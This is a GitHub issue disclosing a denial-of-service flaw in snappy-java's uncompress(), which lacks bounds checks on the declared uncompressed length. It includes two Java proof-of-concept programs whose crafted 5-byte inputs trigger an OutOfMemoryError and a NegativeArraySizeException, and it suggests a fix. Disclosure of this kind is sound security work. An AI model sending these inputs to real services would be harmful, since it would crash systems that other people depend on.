Skip to content

Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact #625

New issue
New issue
Open
Open
Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact#625
@c2an1

Description

@c2an1
c2an1
opened on Dec 23, 2024

Description

The uncompress() method in snappy-java lacks proper validation of the uncompressedLength, which leads to a potential Denial of Service (DoS) vulnerability. Specifically, with only 5 bytes of input, the library becomes vulnerable to DoS attacks.

Details

In the Snappy.java, the uncompress() method is implemented as follows:

public static byte[] uncompress(byte[] input) throws IOException {
    byte[] result = new byte[Snappy.uncompressedLength(input)];
    Snappy.uncompress(input, 0, input.length, result, 0);
    return result;
}

When creating the new byte[] array, there is no upper bounds check on the uncompressedLength. As a result, if uncompressedLength is too large, it can lead to an OutOfMemoryError, similar to the vulnerability of snappy-java described in GHSA-55g7-9cwv-5qfv (GitHub advisory).

Proof of Concept (PoC) 1

import org.xerial.snappy.Snappy;

public class PoC1 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x07 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.OutOfMemoryError

Similarly, as seen in GHSA-pqr6-cmr2-h8hf (GitHub advisory), the absence of lower bounds checks on uncompressedLength can lead to a NegativeArraySizeException due to integer overflow.

Proof of Concept (PoC) 2

import org.xerial.snappy.Snappy;

public class PoC2 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x08 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception:
java.lang.NegativeArraySizeException

Impact
Denial of Service (DoS).

Mitigation
To resolve this issue, we suggest adding bounds validation in the uncompress() method before allocating the array. Specifically, ensure that Snappy.uncompressedLength(input) is greater than 0 and below a reasonable upper limit, similar to the fix applied in GHSA-55g7-9cwv-5qfv.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions